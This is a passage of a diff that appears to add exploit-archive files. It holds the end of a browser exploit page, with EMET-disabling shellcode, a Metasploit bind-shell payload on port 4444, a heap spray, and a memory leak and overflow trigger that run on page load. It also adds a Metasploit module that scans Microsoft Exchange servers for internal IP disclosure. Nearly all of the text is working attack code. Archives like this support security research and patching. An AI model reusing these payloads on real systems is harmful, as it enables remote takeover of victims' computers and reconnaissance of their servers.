+    // MOV     EAX,DWORD PTR DS:[076D10BCH]
+    // MOV     ESI,DWORD PTR [EAX+518H]
+    // SUB     ESP,2CCH
+    // MOV     DWORD PTR [ESP],10010H
+    // MOV     EDI,ESP
+    // MOV     ECX,2CCH
+    // ADD     EDI,4
+    // SUB     ECX,4
+    // XOR     EAX,EAX
+    // REP STOS BYTE PTR ES:[EDI]
+    // PUSH    ESP
+    // PUSH    0FFFFFFFEH
+    // CALL    ESI
+    shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +
+                         "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
+                         "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
+                         "%ufe6a%ud6ff");
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    // EMET disable part 0x02 end
+
+    // Bind shellcode on 4444 :)
+    // msf > generate -t js_le
+    // windows/shell_bind_tcp - 342 bytes
+    // http://www.metasploit.com
+    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
+    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
+    // I would keep the shellcode the same size for better reliability :)
+
+    shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
+                             "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
+                             "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
+                             "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
+                             "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
+                             "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
+                             "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
+                             "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
+                             "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
+                             "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
+                             "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
+                             "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
+                             "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
+                             "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
+                             "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
+                             "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
+                             "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
+                             "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
+                             "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
+                             "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
+                             "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
+                             "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
+                             "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
+                             "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
+                             "%u006a%uff53%u41d5");
+
+    // Total spray should be 1000
+    var padding = unescape("%u9090");
+    while (padding.length < 1000)
+        padding = padding + padding;
+    var padding = padding.substr(0, 1000 - shellcode.length);
+
+    shellcode+= padding;
+
+    while (shellcode.length < 100000)
+        shellcode = shellcode + shellcode;
+
+    var onemeg = shellcode.substr(0, 64*1024/2);
+
+    for (i=0; i<14; i++) {
+        onemeg += shellcode.substr(0, 64*1024/2);
+    }
+
+    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
+
+    var spray = new Array();
+
+    for (i=0; i<100; i++) {
+        spray[i] = onemeg.substr(0, onemeg.length);
+    }
+}
+
+function leak(){
+        var leak_col = document.getElementById("132");
+        leak_col.width = "41";
+        leak_col.span = "19";
+}
+
+function get_leak() {
+        var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
+        str_addr = str_addr - 1410704;
+        var hex = str_addr.toString(16);
+        //alert(hex);
+        setTimeout(function(){heapspray(str_addr)}, 50);
+}
+
+function trigger_overflow(){
+        var evil_col = document.getElementById("132");
+        evil_col.width = "1245880";
+        evil_col.span = "44";
+}
+
+setTimeout(function(){leak()}, 400);
+setTimeout(function(){get_leak()},450);
+setTimeout(function(){trigger_overflow()}, 700);
+
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/webapps/34817.rb b/platforms/windows/webapps/34817.rb
new file mode 100755
index 000000000..8c9c3650c
--- /dev/null
+++ b/platforms/windows/webapps/34817.rb
@@ -0,0 +1,123 @@
+# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
+# Google Dork: NA
+# Date: 08/01/2014
+# Exploit Author: Nate Power
+# Vendor Homepage: microsoft.com
+# Software Link: NA
+# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
+# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
+# CVE : NA
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+    super(
+      'Name'           => 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
+      'Description'    => %q{
+        This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 2013 servers.
+      },
+      'Author'         =>
+        [
+          'Nate Power'
+        ],
+      'DisclosureDate' => 'Aug 01 2014',
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => {
+        'SSL' => true
+      }
+    )
+
+   register_options(
+       [
+        OptInt.new('TIMEOUT', [ true, "HTTP connection timeout", 10]),
+        OptInt.new('RPORT', [ true, "The target port", 443]),
+       ], self.class)
+  end
+
+  def run_host(target_host)
+   rhost = target_host
+   print_status("#{msg} Checking HTTP headers")
+   get_ip_extract
+  end
+
+  def get_ip_extract
+    urls = ["/Microsoft-Server-ActiveSync/default.eas",
+      "/Microsoft-Server-ActiveSync",
+      "/Autodiscover/Autodiscover.xml",
+      "/Autodiscover",
+      "/Exchange",
+      "/Rpc",
+      "/EWS/Exchange.asmx",
+      "/EWS/Services.wsdl",
+      "/EWS",
+      "/ecp",
+      "/OAB",
+      "/OWA",
+      "/aspnet_client",
+      "/PowerShell"]
+
+    result = nil
+
+    urls.each do |url|
+      begin
+        res = send_request_cgi({
+          'version' => "1.0",
+          'uri'      => "#{url}",
+          'method'   => 'GET',
+          'vhost'  =>  ''
+        }, timeout = datastore['TIMEOUT'])
+      
+      rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
+        print_error("#{msg} HTTP Connection Failed")
+        next
+      end
+
+      if not res
+        print_error("#{msg} HTTP Connection Timeout")
+        next
+      end
+
+      if res and res.code == 401 and (match = res['WWW-Authenticate'].match(/Basic realm=\"(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\"/i))
+        result = match.captures[0]
+        print_status("#{msg} Status Code: 401 response")
+        print_status("#{msg} Found Path: " + url )
+        print_good("#{msg} Found target internal IP address: " + result)
+        return result
+       elseif
+        print_warning("#{msg} No internal address found")
+        next
+      end
+
+      if res and (res.code > 300 and res.code < 310) and (match = res['Location'].match(/^http[s]:\/\/(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\//i))
+        result = match.captures[0]
+        print_status("#{msg} Status Code: #{res.code} response")
+        print_status("#{msg} Found Path: " + url )
+        print_good("#{msg} Found target internal IP address: " + result)
+        return result
+       elseif
+        print_warning("#{msg} No internal address found")
+        next
+      end
+    end
+
+    if result.nil?
+      print_warning("#{msg} Nothing found")
+    end
+
+    return result
+  end
+  def msg
+    "#{rhost}:#{rport} -"
+  end
+end
+